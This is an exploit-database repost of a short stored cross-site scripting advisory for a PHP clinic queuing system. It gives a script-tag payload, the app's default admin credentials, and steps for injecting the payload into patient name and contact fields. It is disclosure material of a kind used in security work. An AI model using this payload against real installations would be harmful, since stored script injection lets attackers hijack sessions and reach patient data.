Advertisement






Clinic Queuing System - XSS

CVE Category Price Severity
Not specified CWE-79 (Improper Neutralization of Input During Web Page Generation) Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2023-04-15
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023040058

Below is a copy:

Clinic Queuing System - XSS
# Title : Clinic Queuing System - XSS
# Author : @Eawhitehat - Eren Arslan
# Demo available : https://www.sourcecodester.com/php/16439/clinic-queuing-system-using-php-and-sqlite3-source-code-free-download.html
# CVE: N/A
Used Payload :
"><script>(/eawhitehat is here/)</script>

Admin account :
Username: admin
Password: sourcecodester&123

Method :
Connect to panel : http://localhost/login.php
#Vulnerablity
1. After login with admin account, go to http://localhost/?page=manage_patient (+ Add Record)
2. Add the payload : "><script>(/eawhitehat is here/)</script> in ""Fullname", "Contact" and Save
3. After page reloaded your XSS Loaded
Enjoy !

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.